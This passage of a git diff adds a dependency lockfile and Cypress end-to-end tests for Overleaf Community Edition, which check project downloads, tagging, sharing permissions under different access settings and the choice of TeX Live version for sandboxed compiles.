"sha512-2p2KJZTSqQ/I3+HX42EpYOa2l3f8Erv8MWKsy2I9uf4wA7yFIkXRffYdsx86y6z4vHtV8u7g+pPlr8/4ouAxsQ==", + "dependencies": { + "asn1": "~0.2.3", + "assert-plus": "^1.0.0", + "bcrypt-pbkdf": "^1.0.0", + "dashdash": "^1.12.0", + "ecc-jsbn": "~0.1.1", + "getpass": "^0.1.1", + "jsbn": "~0.1.0", + "safer-buffer": "^2.0.2", + "tweetnacl": "~0.14.0" + }, + "bin": { + "sshpk-conv": "bin/sshpk-conv", + "sshpk-sign": "bin/sshpk-sign", + "sshpk-verify": "bin/sshpk-verify" + }, + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/statuses": { + "version": "2.0.1", + "resolved": "https://registry.npmjs.org/statuses/-/statuses-2.0.1.tgz", + "integrity": "sha512-RwNA9Z/7PrK06rYLIzFMlaF+l73iwpzsqRIFgbMLbTcLD6cOao82TaWefPXQvB2fOC4AjuYSEndS7N/mTCbkdQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/stop-iteration-iterator": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/stop-iteration-iterator/-/stop-iteration-iterator-1.0.0.tgz", + "integrity": "sha512-iCGQj+0l0HOdZ2AEeBADlsRC+vsnDsZsbdSiH1yNSjcfKM7fdpCMfqAL/dwF5BLiw/XhRft/Wax6zQbhq2BcjQ==", + "dependencies": { + "internal-slot": "^1.0.4" + }, + "engines": { + "node": ">= 0.4" + } + }, + "node_modules/string_decoder": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/string_decoder/-/string_decoder-1.3.0.tgz", + "integrity": "sha512-hkRX8U1WjJFd8LsDJ2yQ/wWWxaopEsABU1XfkM8A+j0+85JAGppt16cr1Whg6KIbb4okU6Mql6BOj+uup/wKeA==", + "dependencies": { + "safe-buffer": "~5.2.0" + } + }, + "node_modules/string-width": { + "version": "4.2.3", + "resolved": "https://registry.npmjs.org/string-width/-/string-width-4.2.3.tgz", + "integrity": "sha512-wKyQRQpjJ0sIp62ErSZdGsjMJWsap5oRNihHhu6G7JVO/9jIB6UyevL+tXuOqrng8j/cxKTWyWUwvSTriiZz/g==", + "dependencies": { + "emoji-regex": "^8.0.0", + "is-fullwidth-code-point": "^3.0.0", + "strip-ansi": "^6.0.1" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/strip-ansi": { + "version": "6.0.1", + "resolved": "https://registry.npmjs.org/strip-ansi/-/strip-ansi-6.0.1.tgz", + "integrity": "sha512-Y38VPSHcqkFrCpFnQ9vuSXmquuv5oXOKpGeT6aGrr3o3Gc9AlVa6JBfUSOCnbxGGZF+/0ooI7KrPuUSztUdU5A==", + "dependencies": { + "ansi-regex": "^5.0.1" + }, + "engines": { + "node": 
">=8" + } + }, + "node_modules/strip-final-newline": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/strip-final-newline/-/strip-final-newline-2.0.0.tgz", + "integrity": "sha512-BrpvfNAE3dcvq7ll3xVumzjKjZQ5tI1sEUIKr3Uoks0XUl45St3FlatVqef9prk4jRDzhW6WZg+3bk93y6pLjA==", + "engines": { + "node": ">=6" + } + }, + "node_modules/supports-color": { + "version": "7.2.0", + "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-7.2.0.tgz", + "integrity": "sha512-qpCAvRl9stuOHveKsn7HncJRvv501qIacKzQlO/+Lwxc9+0q2wLyv4Dfvt80/DPn2pqOBsJdDiogXGR9+OvwRw==", + "dependencies": { + "has-flag": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/throttleit": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/throttleit/-/throttleit-1.0.0.tgz", + "integrity": "sha512-rkTVqu6IjfQ/6+uNuuc3sZek4CEYxTJom3IktzgdSxcZqdARuebbA/f4QmAxMQIxqq9ZLEUkSYqvuk1I6VKq4g==" + }, + "node_modules/through": { + "version": "2.3.8", + "resolved": "https://registry.npmjs.org/through/-/through-2.3.8.tgz", + "integrity": "sha512-w89qg7PI8wAdvX60bMDP+bFoD5Dvhm9oLheFp5O4a2QF0cSBGsBX4qZmadPMvVqlLJBBci+WqGGOAPvcDeNSVg==" + }, + "node_modules/tmp": { + "version": "0.2.3", + "resolved": "https://registry.npmjs.org/tmp/-/tmp-0.2.3.tgz", + "integrity": "sha512-nZD7m9iCPC5g0pYmcaxogYKggSfLsdxl8of3Q/oIbqCqLLIO9IAF0GWjX1z9NZRHPiXv8Wex4yDCaZsgEw0Y8w==", + "engines": { + "node": ">=14.14" + } + }, + "node_modules/toidentifier": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/toidentifier/-/toidentifier-1.0.1.tgz", + "integrity": "sha512-o5sSPKEkg/DIQNmH43V0/uerLrpzVedkUh8tGNvaeXpfpuwjKenlSox/2O/BTlZUtEe+JG7s5YhEz608PlAHRA==", + "engines": { + "node": ">=0.6" + } + }, + "node_modules/tough-cookie": { + "version": "4.1.3", + "resolved": "https://registry.npmjs.org/tough-cookie/-/tough-cookie-4.1.3.tgz", + "integrity": "sha512-aX/y5pVRkfRnfmuX+OdbSdXvPe6ieKX/G2s7e98f4poJHnqH3281gDPm/metm6E/WRamfx7WC4HUqkWHfQHprw==", + "dependencies": { + "psl": "^1.1.33", + "punycode": "^2.1.1", + "universalify": "^0.2.0", + "url-parse": "^1.5.3" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/tough-cookie/node_modules/universalify": { + "version": "0.2.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-0.2.0.tgz", + "integrity": "sha512-CJ1QgKmNg3CwvAv/kOFmtnEN05f0D/cn9QntgNOQlQF9dgvVTHj3t+8JPdjqawCHk7V/KA+fbUqzZ9XWhcqPUg==", + "engines": { + "node": ">= 4.0.0" + } + }, + "node_modules/tslib": { + "version": "2.6.2", + "resolved": "https://registry.npmjs.org/tslib/-/tslib-2.6.2.tgz", + "integrity": "sha512-AEYxH93jGFPn/a2iVAwW87VuUIkR1FVUKB77NwMF7nBTDkDrrT/Hpt/IrCJ0QXhW27jTBDcf5ZY7w6RiqTMw2Q==" + }, + "node_modules/tunnel-agent": { + "version": "0.6.0", + "resolved": "https://registry.npmjs.org/tunnel-agent/-/tunnel-agent-0.6.0.tgz", + "integrity": "sha512-McnNiV1l8RYeY8tBgEpuodCC1mLUdbSN+CYBL7kJsJNInOP8UjDDEwdk6Mw60vdLLrr5NHKZhMAOSrR2NZuQ+w==", + "dependencies": { + "safe-buffer": "^5.0.1" + }, + "engines": { + "node": "*" + } + }, + "node_modules/tweetnacl": { + "version": "0.14.5", + "resolved": "https://registry.npmjs.org/tweetnacl/-/tweetnacl-0.14.5.tgz", + "integrity": "sha512-KXXFFdAbFXY4geFIwoyNK+f5Z1b7swfXABfL7HXCmoIWMKU3dmS26672A4EeQtDzLKy7SXmfBu51JolvEKwtGA==" + }, + "node_modules/type-fest": { + "version": "0.21.3", + "resolved": "https://registry.npmjs.org/type-fest/-/type-fest-0.21.3.tgz", + "integrity": "sha512-t0rzBq87m3fVcduHDUFhKmyyX+9eo6WQjZvf51Ea/M0Q7+T374Jp1aUiyUl0GKxp8M/OETVHSDvmkyPgvX+X2w==", + "engines": { + "node": ">=10" 
+ }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/type-is": { + "version": "1.6.18", + "resolved": "https://registry.npmjs.org/type-is/-/type-is-1.6.18.tgz", + "integrity": "sha512-TkRKr9sUTxEH8MdfuCSP7VizJyzRNMjj2J2do2Jr3Kym598JVdEksuzPQCnlFPW4ky9Q+iA+ma9BGm06XQBy8g==", + "dependencies": { + "media-typer": "0.3.0", + "mime-types": "~2.1.24" + }, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/typescript": { + "version": "5.2.2", + "resolved": "https://registry.npmjs.org/typescript/-/typescript-5.2.2.tgz", + "integrity": "sha512-mI4WrpHsbCIcwT9cF4FZvr80QUeKvsUsUvKDoR+X/7XHQH98xYD8YHZg7ANtz2GtZt/CBq2QJ0thkGJMHfqc1w==", + "bin": { + "tsc": "bin/tsc", + "tsserver": "bin/tsserver" + }, + "engines": { + "node": ">=14.17" + } + }, + "node_modules/undici-types": { + "version": "5.26.5", + "resolved": "https://registry.npmjs.org/undici-types/-/undici-types-5.26.5.tgz", + "integrity": "sha512-JlCMO+ehdEIKqlFxk6IfVoAUVmgz7cU7zD/h9XZ0qzeosSHmUJVOzSQvvYSYWXkFXC+IfLKSIffhv0sVZup6pA==" + }, + "node_modules/universalify": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/universalify/-/universalify-2.0.0.tgz", + "integrity": "sha512-hAZsKq7Yy11Zu1DE0OzWjw7nnLZmJZYTDZZyEFHZdUhV8FkH5MCfoU1XMaxXovpyW5nq5scPqq0ZDP9Zyl04oQ==", + "engines": { + "node": ">= 10.0.0" + } + }, + "node_modules/unpipe": { + "version": "1.0.0", + "resolved": "https://registry.npmjs.org/unpipe/-/unpipe-1.0.0.tgz", + "integrity": "sha512-pjy2bYhSsufwWlKwPc+l3cN7+wuJlK6uz0YdJEOlQDbl6jo/YlPi4mb8agUkVC8BF7V8NuzeyPNqRksA3hztKQ==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/untildify": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/untildify/-/untildify-4.0.0.tgz", + "integrity": "sha512-KK8xQ1mkzZeg9inewmFVDNkg3l5LUhoq9kN6iWYB/CC9YMG8HA+c1Q8HwDe6dEX7kErrEVNVBO3fWsVq5iDgtw==", + "engines": { + "node": ">=8" + } + }, + "node_modules/url-parse": { + "version": "1.5.10", + "resolved": "https://registry.npmjs.org/url-parse/-/url-parse-1.5.10.tgz", + "integrity": "sha512-WypcfiRhfeUP9vvF0j6rw0J3hrWrw6iZv3+22h6iRMJ/8z1Tj6XfLP4DsUix5MhMPnXpiHDoKyoZ/bdCkwBCiQ==", + "dependencies": { + "querystringify": "^2.1.1", + "requires-port": "^1.0.0" + } + }, + "node_modules/util-deprecate": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/util-deprecate/-/util-deprecate-1.0.2.tgz", + "integrity": "sha512-EPD5q1uXyFxJpCrLnCc1nHnq3gOa6DZBocAIiI2TaSCA7VCJ1UJDMagCzIkXNsUYfD1daK//LTEQ8xiIbrHtcw==" + }, + "node_modules/utils-merge": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/utils-merge/-/utils-merge-1.0.1.tgz", + "integrity": "sha512-pMZTvIkT1d+TFGvDOqodOclx0QWkkgi6Tdoa8gC8ffGAAqz9pzPTZWAybbsHHoED/ztMtkv/VoYTYyShUn81hA==", + "engines": { + "node": ">= 0.4.0" + } + }, + "node_modules/uuid": { + "version": "9.0.1", + "resolved": "https://registry.npmjs.org/uuid/-/uuid-9.0.1.tgz", + "integrity": "sha512-b+1eJOlsR9K8HJpow9Ok3fiWOWSIcIzXodvv0rQjVoOVNpWMpxf1wZNpt4y9h10odCNrqnYp1OBzRktckBe3sA==", + "funding": [ + "https://github.com/sponsors/broofa", + "https://github.com/sponsors/ctavan" + ], + "bin": { + "uuid": "dist/bin/uuid" + } + }, + "node_modules/vary": { + "version": "1.1.2", + "resolved": "https://registry.npmjs.org/vary/-/vary-1.1.2.tgz", + "integrity": "sha512-BNGbWLfd0eUPabhkXUVm0j8uuvREyTh5ovRa/dyow/BqAbZJyC+5fU+IzQOzmAKzYqYRAISoRhdQr3eIZ/PXqg==", + "engines": { + "node": ">= 0.8" + } + }, + "node_modules/verror": { + "version": "1.10.0", + "resolved": "https://registry.npmjs.org/verror/-/verror-1.10.0.tgz", + 
"integrity": "sha512-ZZKSmDAEFOijERBLkmYfJ+vmk3w+7hOLYDNkRCuRuMJGEmqYNCNLyBBFwWKVMhfwaEF3WOd0Zlw86U/WC/+nYw==", + "engines": [ + "node >=0.6.0" + ], + "dependencies": { + "assert-plus": "^1.0.0", + "core-util-is": "1.0.2", + "extsprintf": "^1.2.0" + } + }, + "node_modules/which": { + "version": "2.0.2", + "resolved": "https://registry.npmjs.org/which/-/which-2.0.2.tgz", + "integrity": "sha512-BLI3Tl1TW3Pvl70l3yq3Y64i+awpwXqsGBYWkkqMtnbXgrMD+yj7rhW0kuEDxzJaYXGjEW5ogapKNMEKNMjibA==", + "dependencies": { + "isexe": "^2.0.0" + }, + "bin": { + "node-which": "bin/node-which" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/which-boxed-primitive": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/which-boxed-primitive/-/which-boxed-primitive-1.0.2.tgz", + "integrity": "sha512-bwZdv0AKLpplFY2KZRX6TvyuN7ojjr7lwkg6ml0roIy9YeuSr7JS372qlNW18UQYzgYK9ziGcerWqZOmEn9VNg==", + "dependencies": { + "is-bigint": "^1.0.1", + "is-boolean-object": "^1.1.0", + "is-number-object": "^1.0.4", + "is-string": "^1.0.5", + "is-symbol": "^1.0.3" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-collection": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/which-collection/-/which-collection-1.0.1.tgz", + "integrity": "sha512-W8xeTUwaln8i3K/cY1nGXzdnVZlidBcagyNFtBdD5kxnb4TvGKR7FfSIS3mYpwWS1QUCutfKz8IY8RjftB0+1A==", + "dependencies": { + "is-map": "^2.0.1", + "is-set": "^2.0.1", + "is-weakmap": "^2.0.1", + "is-weakset": "^2.0.1" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/which-typed-array": { + "version": "1.1.13", + "resolved": "https://registry.npmjs.org/which-typed-array/-/which-typed-array-1.1.13.tgz", + "integrity": "sha512-P5Nra0qjSncduVPEAr7xhoF5guty49ArDTwzJ/yNuPIbZppyRxFQsRCWrocxIY+CnMVG+qfbU2FmDKyvSGClow==", + "dependencies": { + "available-typed-arrays": "^1.0.5", + "call-bind": "^1.0.4", + "for-each": "^0.3.3", + "gopd": "^1.0.1", + "has-tostringtag": "^1.0.0" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/wrap-ansi": { + "version": "7.0.0", + "resolved": "https://registry.npmjs.org/wrap-ansi/-/wrap-ansi-7.0.0.tgz", + "integrity": "sha512-YVGIj2kamLSTxw6NsZjoBxfSwsn0ycdesmc4p+Q21c5zPuZ1pl+NfxVdxPtdHvmNVOQ6XSYG4AUtyt/Fi7D16Q==", + "dependencies": { + "ansi-styles": "^4.0.0", + "string-width": "^4.1.0", + "strip-ansi": "^6.0.0" + }, + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/chalk/wrap-ansi?sponsor=1" + } + }, + "node_modules/wrappy": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/wrappy/-/wrappy-1.0.2.tgz", + "integrity": "sha512-l4Sp/DRseor9wL6EvV2+TuQn63dMkPjZ/sp9XkghTEbV9KlPS1xUsZ3u7/IQO4wxtcFB4bgpQPRcR3QCvezPcQ==" + }, + "node_modules/yallist": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", + "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==" + }, + "node_modules/yauzl": { + "version": "2.10.0", + "resolved": "https://registry.npmjs.org/yauzl/-/yauzl-2.10.0.tgz", + "integrity": "sha512-p4a9I6X6nu6IhoGmBqAcbJy1mlC4j27vEPZX9F4L4/vZT3Lyq1VkFHw/V/PUcB9Buo+DG3iHkT0x3Qya58zc3g==", + "dependencies": { + "buffer-crc32": "~0.2.3", + "fd-slicer": "~1.1.0" + } + } + } +} diff --git a/server-ce/test/package.json b/server-ce/test/package.json new file mode 100644 index 0000000..36ba3df --- /dev/null +++ b/server-ce/test/package.json @@ 
-0,0 +1,28 @@ +{ + "name": "@overleaf/server-ce/test", + "description": "e2e tests for Overleaf Community Edition", + "private": true, + "scripts": { + "cypress:open": "cypress open --e2e --browser chrome", + "cypress:run": "cypress run --e2e --browser chrome", + "format": "prettier --list-different $PWD/'**/*.{js,mjs,ts,tsx,json}'", + "format:fix": "prettier --write $PWD/'**/*.{js,mjs,ts,tsx,json}'" + }, + "dependencies": { + "@isomorphic-git/lightning-fs": "^4.6.0", + "@testing-library/cypress": "^10.0.1", + "@types/adm-zip": "^0.5.5", + "@types/pdf-parse": "^1.1.4", + "@types/uuid": "^9.0.8", + "adm-zip": "^0.5.12", + "body-parser": "^1.20.3", + "celebrate": "^15.0.3", + "cypress": "13.13.2", + "express": "^4.21.2", + "isomorphic-git": "^1.25.10", + "js-yaml": "^4.1.0", + "pdf-parse": "^1.1.1", + "typescript": "^5.0.4", + "uuid": "^9.0.1" + } +} diff --git a/server-ce/test/project-list.spec.ts b/server-ce/test/project-list.spec.ts new file mode 100644 index 0000000..3056242 --- /dev/null +++ b/server-ce/test/project-list.spec.ts @@ -0,0 +1,106 @@ +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { v4 as uuid } from 'uuid' + +const WITHOUT_PROJECTS_USER = 'user-without-projects@example.com' +const REGULAR_USER = 'user@example.com' + +describe('Project List', () => { + if (isExcludedBySharding('PRO_DEFAULT_2')) return + startWith({ pro: true }) + + const findProjectRow = (projectName: string) => { + cy.log('find project row') + return cy.findByText(projectName).parent().parent() + } + + describe('user with no projects', () => { + ensureUserExists({ email: WITHOUT_PROJECTS_USER }) + + it("'Import from GitHub' is not displayed in the welcome page", () => { + login(WITHOUT_PROJECTS_USER) + cy.visit('/project') + cy.findByText('Create a new project').click() + cy.findByText(/Import from GitHub/i).should('not.exist') + }) + }) + + describe('user with projects', () => { + const projectName = `test-project-${uuid()}` + ensureUserExists({ email: REGULAR_USER }) + + before(() => { + login(REGULAR_USER) + createProject(projectName, { type: 'Example Project', open: false }) + }) + beforeEach(function () { + login(REGULAR_USER) + cy.visit('/project') + }) + + it('Can download project sources', () => { + findProjectRow(projectName).within(() => + cy.findByRole('button', { name: 'Download .zip file' }).click() + ) + + cy.task('readFileInZip', { + pathToZip: `cypress/downloads/${projectName}.zip`, + fileToRead: 'main.tex', + }).should('contain', 'Your introduction goes here') + }) + + it('Can download project PDF', () => { + findProjectRow(projectName).within(() => + cy.findByRole('button', { name: 'Download PDF' }).click() + ) + + const pdfName = projectName.replaceAll('-', '_') + cy.task('readPdf', `cypress/downloads/${pdfName}.pdf`).should( + 'contain', + 'Your introduction goes here' + ) + }) + + it('can assign and remove tags to projects', () => { + const tagName = uuid().slice(0, 7) // long tag names are truncated in the UI, which affects selectors + cy.log('select project') + cy.get(`[aria-label="Select ${projectName}"]`).click() + + cy.log('add tag to project') + cy.get('button[aria-label="Tags"]').click() + cy.findByText('Create new tag').click() + cy.get('input[name="new-tag-form-name"]').type(`${tagName}{enter}`) + cy.get(`button[aria-label="Select tag ${tagName}"]`) // tag label in project row + + cy.log('remove tag') + cy.get(`button[aria-label="Remove tag 
${tagName}"]`) + .first() + .click({ force: true }) + cy.get(`button[aria-label="Select tag ${tagName}"]`).should('not.exist') + }) + + it('can filter by tag', () => { + cy.log('create a separate project to filter') + const nonTaggedProjectName = `project-${uuid()}` + login(REGULAR_USER) + createProject(nonTaggedProjectName, { open: false }) + + cy.log('select project') + cy.get(`[aria-label="Select ${projectName}"]`).click() + + cy.log('add tag to project') + const tagName = uuid().slice(0, 7) // long tag names are truncated in the UI, which affects selectors + cy.get('button[aria-label="Tags"]').click() + cy.findByText('Create new tag').click() + cy.get('input[name="new-tag-form-name"]').type(`${tagName}{enter}`) + + cy.log( + 'check the non-tagged project is filtered out after clicking the tag' + ) + cy.findByText(nonTaggedProjectName).should('exist') + cy.get('button').contains(tagName).click({ force: true }) + cy.findByText(nonTaggedProjectName).should('not.exist') + }) + }) +}) diff --git a/server-ce/test/project-sharing.spec.ts b/server-ce/test/project-sharing.spec.ts new file mode 100644 index 0000000..e264392 --- /dev/null +++ b/server-ce/test/project-sharing.spec.ts @@ -0,0 +1,305 @@ +import { v4 as uuid } from 'uuid' +import { isExcludedBySharding, startWith } from './helpers/config' +import { ensureUserExists, login } from './helpers/login' +import { + createProject, + enableLinkSharing, + openProjectByName, + openProjectViaLinkSharingAsAnon, + openProjectViaLinkSharingAsUser, + shareProjectByEmailAndAcceptInviteViaDash, + shareProjectByEmailAndAcceptInviteViaEmail, +} from './helpers/project' +import { throttledRecompile } from './helpers/compile' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' + +describe('Project Sharing', function () { + if (isExcludedBySharding('CE_CUSTOM_2')) return + ensureUserExists({ email: 'user@example.com' }) + startWith({ withDataDir: true }) + + let projectName: string + beforeWithReRunOnTestRetry(function () { + projectName = `Project ${uuid()}` + setupTestProject() + }) + + beforeEach(() => { + // Always start with a fresh session + cy.session([uuid()], () => {}) + }) + + let linkSharingReadOnly: string + let linkSharingReadAndWrite: string + + function setupTestProject() { + login('user@example.com') + createProject(projectName) + + // Add chat message + cy.findByText('Chat').click() + // wait for lazy loading of the chat pane + cy.findByText('Send your first message to your collaborators') + cy.get( + 'textarea[placeholder="Send a message to your collaborators…"]' + ).type('New Chat Message{enter}') + + // Get link sharing links + enableLinkSharing().then( + ({ linkSharingReadOnly: ro, linkSharingReadAndWrite: rw }) => { + linkSharingReadAndWrite = rw + linkSharingReadOnly = ro + } + ) + } + + function expectContentReadOnlyAccess() { + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + cy.get('.cm-content').should('contain.text', '\\maketitle') + cy.get('.cm-content').should('have.attr', 'contenteditable', 'false') + } + + function expectContentWriteAccess() { + const section = `Test Section ${uuid()}` + cy.url().should('match', /\/project\/[a-fA-F0-9]{24}/) + const recompile = throttledRecompile() + // wait for the editor to finish loading + cy.get('.cm-content').should('contain.text', '\\maketitle') + // the editor should be writable + cy.get('.cm-content').should('have.attr', 'contenteditable', 'true') + cy.findByText('\\maketitle').parent().click() + 
cy.findByText('\\maketitle').parent().type(`\n\\section{{}${section}}`) + // should have written + cy.get('.cm-content').should('contain.text', `\\section{${section}}`) + // check PDF + recompile() + cy.get('.pdf-viewer').should('contain.text', projectName) + cy.get('.pdf-viewer').should('contain.text', section) + } + + function expectNoAccess() { + // try read only access link + cy.visit(linkSharingReadOnly) + cy.url().should('match', /\/login/) + + // Cypress bugs: cypress resolves the link-sharing link outside the browser, and it carries over the hash of the link-sharing link to the login page redirect (bug 1). + // Effectively, cypress then instructs the browser to change the page from /login#read-only-hash to /login#read-and-write-hash. + // This in turn does not trigger a "page load", but rather just "scrolling", which in turn trips up the "page loaded" detection in cypress (bug 2). + // Work around this by navigating away from the /login page in between checks. + cy.visit('/user/password/reset') + + // try read and write access link + cy.visit(linkSharingReadAndWrite) + cy.url().should('match', /\/login/) + } + + function expectChatAccess() { + cy.findByText('Chat').click() + cy.findByText('New Chat Message') + } + + function expectHistoryAccess() { + cy.findByText('History').click() + cy.findByText('Labels') + cy.findByText(/\\begin\{document}/) + cy.findAllByTestId('history-version-metadata-users') + .last() + .should('have.text', 'user') + cy.findByText('Back to editor').click() + } + + function expectNoChatAccess() { + cy.findByText('Layout') // wait for lazy loading + cy.findByText('Chat').should('not.exist') + } + + function expectNoHistoryAccess() { + cy.findByText('Layout') // wait for lazy loading + cy.findByText('History').should('not.exist') + } + + function expectFullReadOnlyAccess() { + expectContentReadOnlyAccess() + expectChatAccess() + expectHistoryAccess() + } + + function expectRestrictedReadOnlyAccess() { + expectContentReadOnlyAccess() + expectNoChatAccess() + expectNoHistoryAccess() + } + + function expectReadAndWriteAccess() { + expectContentWriteAccess() + expectChatAccess() + expectHistoryAccess() + } + + function expectProjectDashboardEntry() { + cy.visit('/project') + cy.findByText(projectName) + } + + function expectEditAuthoredAs(author: string) { + cy.findByText('History').click() + cy.findAllByTestId('history-version-metadata-users') + .first() + .should('contain.text', author) // might have other edits in the same group + } + + describe('via email', function () { + const email = 'collaborator-email@example.com' + ensureUserExists({ email }) + + beforeEach(function () { + login('user@example.com') + shareProjectByEmailAndAcceptInviteViaEmail(projectName, email, 'Viewer') + }) + + it('should grant the collaborator read access', () => { + expectFullReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read only', () => { + const email = 'collaborator-ro@example.com' + ensureUserExists({ email }) + + beforeWithReRunOnTestRetry(function () { + login('user@example.com') + shareProjectByEmailAndAcceptInviteViaDash(projectName, email, 'Viewer') + }) + + it('should grant the collaborator read access', () => { + login(email) + openProjectByName(projectName) + expectFullReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read and write', () => { + const email = 'collaborator-rw@example.com' + ensureUserExists({ email }) + + beforeWithReRunOnTestRetry(function () { + login('user@example.com') +
shareProjectByEmailAndAcceptInviteViaDash(projectName, email, 'Editor') + }) + + it('should grant the collaborator write access', () => { + login(email) + openProjectByName(projectName) + expectReadAndWriteAccess() + expectEditAuthoredAs('You') + expectProjectDashboardEntry() + }) + }) + + describe('token access', () => { + describe('logged in', () => { + describe('read only', () => { + const email = 'collaborator-link-ro@example.com' + ensureUserExists({ email }) + + it('should grant restricted read access', () => { + login(email) + openProjectViaLinkSharingAsUser( + linkSharingReadOnly, + projectName, + email + ) + expectRestrictedReadOnlyAccess() + expectProjectDashboardEntry() + }) + }) + + describe('read and write', () => { + const email = 'collaborator-link-rw@example.com' + ensureUserExists({ email }) + + it('should grant full write access', () => { + login(email) + openProjectViaLinkSharingAsUser( + linkSharingReadAndWrite, + projectName, + email + ) + expectReadAndWriteAccess() + expectEditAuthoredAs('You') + expectProjectDashboardEntry() + }) + }) + }) + + describe('with OVERLEAF_ALLOW_PUBLIC_ACCESS=false', () => { + describe('wrap startup', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'false', + }, + withDataDir: true, + }) + it('should block access', () => { + expectNoAccess() + }) + }) + + describe('with OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING=true', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'false', + OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true', + }, + withDataDir: true, + }) + it('should block access', () => { + expectNoAccess() + }) + }) + }) + + describe('with OVERLEAF_ALLOW_PUBLIC_ACCESS=true', () => { + describe('wrap startup', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'true', + }, + withDataDir: true, + }) + it('should grant read access with read link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadOnly) + expectRestrictedReadOnlyAccess() + }) + + it('should prompt for login with write link', () => { + cy.visit(linkSharingReadAndWrite) + cy.url().should('match', /\/login/) + }) + }) + + describe('with OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING=true', () => { + startWith({ + vars: { + OVERLEAF_ALLOW_PUBLIC_ACCESS: 'true', + OVERLEAF_ALLOW_ANONYMOUS_READ_AND_WRITE_SHARING: 'true', + }, + withDataDir: true, + }) + + it('should grant read access with read link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadOnly) + expectRestrictedReadOnlyAccess() + }) + + it('should grant write access with write link', () => { + openProjectViaLinkSharingAsAnon(linkSharingReadAndWrite) + expectReadAndWriteAccess() + expectEditAuthoredAs('Anonymous') + }) + }) + }) + }) +}) diff --git a/server-ce/test/sandboxed-compiles.spec.ts b/server-ce/test/sandboxed-compiles.spec.ts new file mode 100644 index 0000000..505f8cf --- /dev/null +++ b/server-ce/test/sandboxed-compiles.spec.ts @@ -0,0 +1,245 @@ +import { ensureUserExists, login } from './helpers/login' +import { createProject } from './helpers/project' +import { isExcludedBySharding, startWith } from './helpers/config' +import { throttledRecompile } from './helpers/compile' +import { v4 as uuid } from 'uuid' +import { waitUntilScrollingFinished } from './helpers/waitUntilScrollingFinished' +import { beforeWithReRunOnTestRetry } from './helpers/beforeWithReRunOnTestRetry' + +const LABEL_TEX_LIVE_VERSION = 'TeX Live version' + +describe('SandboxedCompiles', function () { + const enabledVars = { + DOCKER_RUNNER: 'true', + 
SANDBOXED_COMPILES: 'true', + SANDBOXED_COMPILES_SIBLING_CONTAINERS: 'true', + ALL_TEX_LIVE_DOCKER_IMAGE_NAMES: '2023,2022', + } + + describe('enabled in Server Pro', function () { + if (isExcludedBySharding('PRO_CUSTOM_2')) return + startWith({ + pro: true, + vars: enabledVars, + resetData: true, + }) + ensureUserExists({ email: 'user@example.com' }) + beforeEach(function () { + login('user@example.com') + }) + + it('should offer TexLive images and switch the compiler', function () { + createProject('sandboxed') + const recompile = throttledRecompile() + cy.log('wait for compile') + cy.get('.pdf-viewer').should('contain.text', 'sandboxed') + + cy.log('Check which compiler version was used, expect 2023') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2023\) /) + + cy.log('Switch TeXLive version from 2023 to 2022') + cy.get('header').findByText('Menu').click() + cy.findByText(LABEL_TEX_LIVE_VERSION) + .parent() + .findByText('2023') + .parent() + .select('2022') + cy.get('.left-menu-modal-backdrop').click() + + cy.log('Trigger compile with other TeX Live version') + recompile() + + cy.log('Check which compiler version was used, expect 2022') + cy.get('[aria-label="View logs"]').click() + cy.findByText(/This is pdfTeX, Version .+ \(TeX Live 2022\) /) + }) + + checkSyncTeX() + checkXeTeX() + checkRecompilesAfterErrors() + }) + + function checkSyncTeX() { + describe('SyncTeX', function () { + let projectName: string + beforeEach(function () { + projectName = `Project ${uuid()}` + createProject(projectName) + const recompile = throttledRecompile() + cy.findByText('\\maketitle').parent().click() 